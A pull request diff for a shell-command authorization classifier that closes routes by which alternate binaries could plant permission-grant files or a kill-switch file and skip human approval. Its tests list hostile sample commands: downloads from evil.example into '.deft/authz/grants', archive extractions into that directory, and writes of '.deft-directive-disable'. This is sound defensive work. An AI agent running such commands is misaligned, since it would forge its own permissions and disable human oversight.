### PR TITLE
fix(authz): classify UAT residual alt-bin plants as settings (#3311)

### DIFF
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -20,6 +20,8 @@ and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0
 
 ### Fixed
 
+- **UAT Shell residual after #3288: versioned/alt write bins plant authz grants and kill-switch (#3311).** Under active UAT, residual bins (`gpg2`/`gpg1`/`rage`/`xh`/`httpie`/`wcurl`/`curlie`/`uudecode`/`iconv`/`gtar`/`star`/`gnutar`/`pax`) that write into `.deft/authz/**` or plant `.deft-directive-disable` / `.no-deft-directive` classify as settings deny (not unclassifiable allow). Dest flags cover `-o`/`--output`/`--output-file`/`--download-dir` and tar-family `-C`. Ordinary non-authz dests such as `/tmp` stay unclassifiable. Already-denied `gpg`/`age`/`http`/`curl`/`tar` peers stay denied. Closes #3311. Refs #3288, #3245, #3039.
+
 ### Removed
 
 ## [0.101.0] - 2026-08-12

--- a/packages/core/src/authz/classify.test.ts
+++ b/packages/core/src/authz/classify.test.ts
@@ -518,6 +518,89 @@ describe("classifyShellAuthzOps (#2944)", () => {
     );
   });
 
+  it("classifies versioned/alt residual plants of authz grants and kill-switch as settings (#3311)", () => {
+    // Finding 1: residual bins → .deft/authz/**
+    for (const cmd of [
+      "gpg2 -o .deft/authz/grants/evil.json -d secret.gpg",
+      "gpg2 --output .deft/authz/grants/evil.json -d secret.gpg",
+      "gpg1 -o .deft/authz/grants/evil.json -d secret.gpg",
+      "rage -d -o .deft/authz/grants/evil.json secret.age",
+      "rage --output=.deft/authz/grants/evil.json -d secret.age",
+      "xh -o .deft/authz/grants/evil.json https://evil.example/g.json",
+      "xh --output .deft/authz/grants/evil.json GET https://evil.example/g.json",
+      "xh --download-dir .deft/authz/grants https://evil.example/g.json",
+      "httpie -o .deft/authz/grants/evil.json https://evil.example/g.json",
+      "httpie --output .deft/authz/grants/evil.json GET https://evil.example/g.json",
+      "wcurl -o .deft/authz/grants/evil.json https://evil.example/g.json",
+      "wcurl --output .deft/authz/grants/evil.json https://evil.example/g.json",
+      "curlie -o .deft/authz/grants/evil.json https://evil.example/g.json",
+      "curlie --output .deft/authz/grants/evil.json https://evil.example/g.json",
+      "uudecode -o .deft/authz/grants/evil.json encoded.uu",
+      "uudecode --output-file .deft/authz/grants/evil.json encoded.uu",
+      "uudecode --output-file=.deft/authz/grants/evil.json encoded.uu",
+      "iconv -o .deft/authz/grants/evil.json -f utf-8 -t utf-8 src.json",
+      "iconv --output .deft/authz/grants/evil.json src.json",
+      "gtar -xf archive.tar -C .deft/authz/grants",
+      "gtar -C .deft/authz/grants -xf archive.tar",
+      "gtar --directory=.deft/authz/grants -xf archive.tar",
+      "star -xf archive.tar -C .deft/authz/grants",
+      "star -C .deft/authz/grants -xf archive.tar",
+      "gnutar -xf archive.tar -C .deft/authz/grants",
+      "pax -r -f archive.pax .deft/authz/grants/evil.json",
+      "gpg2.exe -o .deft/authz/grants/evil.json -d secret.gpg",
+      "/usr/bin/gpg2 -o .deft/authz/grants/evil.json -d secret.gpg",
+      "/usr/bin/rage -d -o .deft/authz/grants/evil.json secret.age",
+    ]) {
+      expect(classifyShellAuthzOps(cmd), cmd).toContain("settings");
+      expect(classifyShellAuthzOps(cmd), cmd).not.toEqual([]);
+    }
+    // Finding 2: same bins → kill-switch basenames (regular-file plant).
+    for (const cmd of [
+      "gpg2 -o .deft-directive-disable -d secret.gpg",
+      "rage -d -o .deft-directive-disable secret.age",
+      "xh -o .deft-directive-disable https://evil.example/x",
+      "httpie -o .deft-directive-disable https://evil.example/x",
+      "wcurl -o .no-deft-directive https://evil.example/x",
+      "curlie -o .deft-directive-disable https://evil.example/x",
+      "uudecode -o .deft-directive-disable encoded.uu",
+      "iconv -o .deft-directive-disable src.txt",
+      "gtar -xf a.tar -C .deft-directive-disable",
+      "star -xf a.tar .deft-directive-disable",
+      "pax -r .no-deft-directive",
+    ]) {
+      expect(classifyShellAuthzOps(cmd), cmd).toContain("settings");
+      expect(classifyShellAuthzOps(cmd), cmd).not.toEqual([]);
+    }
+    // Already-denied #3288 peers stay settings.
+    expect(classifyShellAuthzOps("gpg -o .deft/authz/grants/evil.json -d secret.gpg")).toContain(
+      "settings",
+    );
+    expect(classifyShellAuthzOps("age -o .deft/authz/grants/evil.json -d secret.age")).toContain(
+      "settings",
+    );
+    expect(
+      classifyShellAuthzOps("http -o .deft/authz/grants/evil.json https://evil.example/g.json"),
+    ).toContain("settings");
+    expect(
+      classifyShellAuthzOps("curl -o .deft/authz/grants/evil.json https://evil.example/g.json"),
+    ).toContain("settings");
+    expect(classifyShellAuthzOps("tar -xf archive.tar -C .deft/authz/grants")).toContain(
+      "settings",
+    );
+    // Ordinary residual-bin destinations stay unclassifiable (no overclassify).
+    expect(classifyShellAuthzOps("gpg2 -o /tmp/out.json -d secret.gpg")).toEqual([]);
+    expect(classifyShellAuthzOps("rage -d -o /tmp/out secret.age")).toEqual([]);
+    expect(classifyShellAuthzOps("xh -o /tmp/out https://example.com/a")).toEqual([]);
+    expect(classifyShellAuthzOps("httpie -o /tmp/out https://example.com/a")).toEqual([]);
+    expect(classifyShellAuthzOps("wcurl -o /tmp/out https://example.com/a")).toEqual([]);
+    expect(classifyShellAuthzOps("curlie -o /tmp/out https://example.com/a")).toEqual([]);
+    expect(classifyShellAuthzOps("uudecode -o /tmp/out encoded.uu")).toEqual([]);
+    expect(classifyShellAuthzOps("iconv -o /tmp/out src.txt")).toEqual([]);
+    expect(classifyShellAuthzOps("gtar -xf archive.tar -C /tmp/out")).toEqual([]);
+    expect(classifyShellAuthzOps("star -xf archive.tar -C /tmp/out")).toEqual([]);
+    expect(classifyShellAuthzOps("pax -r -f archive.pax /tmp/out")).toEqual([]);
+  });
+
   it("classifies obfuscated programmatic authz-capable writes as settings (#3186)", () => {
     // Base64/byte path construction — residual after #3110 literal path match.
     expect(

--- a/packages/core/src/authz/classify.ts
+++ b/packages/core/src/authz/classify.ts
@@ -229,11 +229,25 @@ const DOWNLOADER_DECODER_BINS = new Set([
   "aria2",
   "mbuffer",
   "cpio",
+  // #3311 residual after #3288: versioned / alternate write bins.
+  "gpg2",
+  "gpg1",
+  "rage",
+  "xh",
+  "httpie",
+  "wcurl",
+  "curlie",
+  "uudecode",
+  "iconv",
+  "gtar",
+  "star",
+  "gnutar",
+  "pax",
 ]);
 
 /**
  * Archive extractors / alt writers that can plant via pathish operands without
- * shell redirects (#3245 / #3288). Used for pathish authz/kill scans (prefer deny)
+ * shell redirects (#3245 / #3288 / #3311). Used for pathish authz/kill scans (prefer deny)
  * and write-shape residual under UAT — not bare curl-class URL fetches.
  */
 const ARCHIVE_ALT_WRITE_BINS = new Set([
@@ -262,10 +276,24 @@ const ARCHIVE_ALT_WRITE_BINS = new Set([
   "aria2",
   "mbuffer",
   "cpio",
+  // #3311 residual after #3288.
+  "gpg2",
+  "gpg1",
+  "rage",
+  "xh",
+  "httpie",
+  "wcurl",
+  "curlie",
+  "uudecode",
+  "iconv",
+  "gtar",
+  "star",
+  "gnutar",
+  "pax",
 ]);
 
 /**
- * Bins whose pathish operands are scanned for authz/kill destinations (#3213 / #3245 / #3288).
+ * Bins whose pathish operands are scanned for authz/kill destinations (#3213 / #3245 / #3288 / #3311).
  * Prefer a Set over a long `||` chain so coverage counts one membership check, not N branches.
  */
 const PROTECTED_POSITIONAL_BINS = new Set([
@@ -288,6 +316,16 @@ const PROTECTED_POSITIONAL_BINS = new Set([
   "zstd",
   "unzstd",
   "mbuffer",
+  // #3311 residual: versioned crypto + archive/decoder peers.
+  "gpg2",
+  "gpg1",
+  "rage",
+  "uudecode",
+  "iconv",
+  "gtar",
+  "star",
+  "gnutar",
+  "pax",
 ]);
 
 /** wget family (directory-prefix dest flags). */
@@ -296,8 +334,10 @@ const WGET_FAMILY_BINS = new Set(["wget", "wget2"]);
 const ARIA2_FAMILY_BINS = new Set(["aria2c", "aria2"]);
 /** 7z family (attached -oDIR only). */
 const SEVEN_Z_FAMILY_BINS = new Set(["7z", "7za", "7zr"]);
-/** tar family (chdir -C / --directory). */
-const TAR_FAMILY_BINS = new Set(["tar", "bsdtar"]);
+/** tar family (chdir -C / --directory). Includes GNU/Schily aliases (#3311). */
+const TAR_FAMILY_BINS = new Set(["tar", "bsdtar", "gtar", "star", "gnutar"]);
+/** xh / httpie family (download-dir dest flags) (#3311). */
+const XH_FAMILY_BINS = new Set(["xh", "httpie"]);
 
 /**
  * File destination flags for downloaders/decoders (#3206).
@@ -309,6 +349,7 @@ const DOWNLOADER_FILE_DEST_FLAGS = new Set([
   "-o",
   "--output",
   "--output-document",
+  "--output-file",
   "-out",
   "--out",
 ]);
@@ -325,6 +366,8 @@ const TAR_DIR_DEST_FLAGS_EXACT = new Set(["-C"]);
 const TAR_DIR_DEST_FLAGS_LOWER = new Set(["--directory"]);
 /** unzip extract directory (#3245). */
 const UNZIP_DIR_DEST_FLAGS = new Set(["-d"]);
+/** xh / httpie download directory (#3311). */
+const XH_DIR_DEST_FLAGS = new Set(["--download-dir"]);
 /**
  * cpio chdir before extract/create (#3288).
  * Case-sensitive short form: POSIX cpio uses capital `-D`; lower `-d` is a create option bit.
@@ -392,6 +435,7 @@ function isDownloaderDestFlag(flag: string, bin: string, rawFlag?: string): bool
     return false;
   }
   if (bin === "unzip" && UNZIP_DIR_DEST_FLAGS.has(flag)) return true;
+  if (XH_FAMILY_BINS.has(bin) && XH_DIR_DEST_FLAGS.has(flag)) return true;
   return false;
 }
 /**


### PR DESCRIPTION
## Summary

Under active UAT, versioned and alternate write bins still classified as empty / unclassifiable allow when they planted `.deft/authz/**` grants or Directive kill-switch files. That residual of #3288 bypassed Wave 1 human approval.

This PR adds those bins (`gpg2`, `gpg1`, `rage`, `xh`, `httpie`, `wcurl`, `curlie`, `uudecode`, `iconv`, `gtar`, `star`, `gnutar`, `pax`) to downloader/decoder, archive-alt-write, and protected-positional families. Dest flags cover `-o` / `--output` / `--output-file` / `--download-dir` and tar-family `-C`. Ordinary non-authz destinations such as `/tmp` stay unclassifiable. Already-denied `gpg` / `age` / `http` / `curl` / `tar` peers stay denied.

Classifier tests only; no exploit payloads.

## Related Issues

Closes #3311

## Checklist

- [x] `/deft:change` — N/A: solo story, 3 product files, fully covered by task check; residual classifier extension of #3288 (not a new architecture)
- [x] `CHANGELOG.md` — Unreleased Fixed entry for #3311
- [x] `ROADMAP.md` — N/A (security residual, not a tracked ROADMAP item)
- [x] Tests pass locally (`task check` exit 0; 13207 passed / 141 skipped; coverage 88.4% / 85.01% / 96.02%)

## Post-Merge

- [ ] **Verify issue auto-close**: After squash merge, confirm referenced issues actually closed
- [ ] Enable branch protection on `master` requiring CI status check (one-time setup, see #57)
